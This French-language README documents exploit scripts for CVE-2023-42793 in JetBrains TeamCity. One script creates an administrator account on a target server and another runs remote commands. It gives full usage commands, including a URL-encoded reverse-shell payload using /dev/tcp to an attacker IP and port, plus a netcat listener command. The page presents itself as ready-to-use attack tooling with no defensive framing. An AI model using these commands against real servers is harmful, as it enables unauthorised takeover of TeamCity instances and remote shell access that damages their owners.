
JetBrains TeamCity 2023.05.3 - Exécution de code à distance (RCE), CVE-2023-42793
utilisez d'abord
exploit.pypour créer un compte administrateur pour vous, puis utilisezrce.pypour exécuter des commandes sur la cible, et pour un reverse shell consultez ce lien
Ce script exploite CVE-2023-42793 pour créer un compte administrateur sur un serveur TeamCity. Il envoie une requête POST à l'URL cible pour créer un utilisateur administrateur avec des identifiants spécifiés ou aléatoires.
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
-u, --url URL : URL cible (obligatoire)-v, --verbose : Activer le mode verbeux-n, --username USERNAME : Spécifier le nom d'utilisateur (par défaut : aléatoire)-p, --password PASSWORD : Spécifier le mot de passe (par défaut : aléatoire)-e, --email EMAIL : Spécifier l'email (par défaut : aléatoire)-t, --token-file : Fichier pour sauvegarder le jetonpip3 install -r requirements.txtExploitation avec nom d'utilisateur, mot de passe et email aléatoires :
python exploit.py -u http://target.com
Exploitation avec nom d'utilisateur, mot de passe et email spécifiés :
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
En cas d'exploitation réussie, le script affiche l'URL, le nom d'utilisateur et le mot de passe du compte administrateur créé, puis sauvegarde la sortie dans le fichier de jeton.
Description Ce script permet d'exécuter des commandes sur un serveur TeamCity vulnérable en exploitant CVE-2023-42793. Il active d'abord les processus de débogage puis exécute la commande spécifiée en utilisant les points d'API appropriés.
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
-u, --url URL : URL cible (obligatoire)-t, --token-file : Pour spécifier le fichier contenant le jeton-c, --command COMMAND : Spécifier la commande à exécuter (RCE)-P, --port PORT : Spécifier le port (par défaut 80)Exploitation avec une commande spécifiée :
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
nc -nvlp 5555